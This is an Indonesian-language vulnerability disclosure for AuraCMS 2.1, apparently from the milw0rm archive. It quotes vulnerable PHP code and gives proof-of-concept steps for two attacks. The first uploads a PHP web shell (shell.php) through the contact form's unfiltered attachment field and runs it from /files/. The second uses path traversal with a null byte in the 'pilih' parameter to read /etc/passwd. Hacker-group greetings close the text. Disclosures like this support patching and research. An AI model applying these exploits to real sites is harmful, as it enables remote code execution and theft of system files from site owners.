######################################################################## # AuraCMS 2.1 - Remote File Attachment - Local File Inclusion # Vendor : http://www.auracms.org/ # Download : http://www.auracms.org/dl_jump.php?id=42 # Ditemukan oleh : k1tk4t - k1tk4t[4t]newhack.org # Lokasi : Indonesia -- #newhack[dot]org @ irc.dal.net ######################################################################## ==================================== Remote File Attachment Vulnerability ==================================== //berkas pada '/mod/contak.php' ---------------- Baris-41 -------------------- if ($_POST['submit']) { $nama = text_filter($_POST['nama']); $email = text_filter($_POST['email']); $pesan = nl2br(text_filter($_POST['pesan'], 2)); $images = text_filter($_POST['image']); checkemail($email); $gfx_check = intval($_POST['gfx_check']); if (!$nama) $error .= "Error: Please enter your name!
"; if (!$pesan) $error .= "Error: Please enter a message!
"; $code = substr(hexdec(md5("".date("F j")."".$_POST['random_num']."".$sitekey."")), 2, 6); if (extension_loaded("gd") AND $code != $_POST['gfx_check']) $error .= "Error: Security Code Invalid
"; if ($error) { $tengah.='
'.$error.'
'; } else { if (!empty ($image_name)){ $image_name = $_FILES['image']['name']; $image_temp = $_FILES['image']['tmp_name']; $tempat = "files/"; @copy($_FILES[image][tmp_name], "./files/".$image_name); if(@copy($_FILES[image][tmp_name], "./files/".$image_name)){ unlink($image); $sukses = "Sukses Upload File ".$image_name; }else{ $sukses = "Gagal Upload File ".$image_name; ---------------- Baris-61 -------------------- pemfilteran "$images" tidak sempurna, sehingga pengguna dapat mengupload/attachment file yang tidak diinginkan kedalam direktori /files/. //POC; http://localhost/auracms2.1/index.php?pilih=../mod/contak atau http://localhost/auracms2.1/index.php?pilih=contak&mod=yes isi semua konten isian, masukan angka 'security code' dengan benar, "Attachment" --> shell.php ; http://localhost/auracms2.1/files/shell.php =================================== Local File Inclusion Vulnerability =================================== //berkas pada '/index.php' - AuraCMS versi 2.x --------- baris-24 ---------- if (isset ($_GET['mod'])) $mod = $_GET['mod'] ; else $mod = ''; if(!isset($_GET['pilih'])){ include 'content/normal.php'; }else { if($mod == "yes" && file_exists("mod/$_GET[pilih].php")){ include "mod/$_GET[pilih].php"; } else { if (eregi('http://', $_GET['pilih']) or !file_exists("content/$_GET[pilih].php") or $_GET['pilih'] == 'index'){ $_GET['pilih'] = 'normal'; --------- baris-39 ---------- //berkas pada '/index.php' - AuraCMS versi 1.x --------- baris-13 ---------- --------- baris-33 ---------- need magic_quotes_gpc = off , jika magic_quotes_gpc = off maka pengguna dapat memanipulasi $pilih //POC; http://localhost/auracms.x.x/index.php?pilih=../../../../../../../etc/passwd%00 ######################################################################## Terimakasih untuk; str0ke, DNX xoron,iFX,x-ace,nyubi,arioo,selikoer,k1n9k0ng,aldy_BT,adhietslank dan semua temen2 komunitas security&hacking ----------------------- -newhack[dot]org|staff- mR.opt1lc ,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX ----------------------- all member newhack[dot]org ----------------------- all member www.echo.or.id ----------------------- all member www.yogyafree.net ----------------------- all member www.sekuritionline.net ----------------------- all member www.kecoak-elektronik.net ----------------------- semua komunitas hacker&security Indonesia Cintailah Bahasa Indonesia # milw0rm.com [2007-09-10]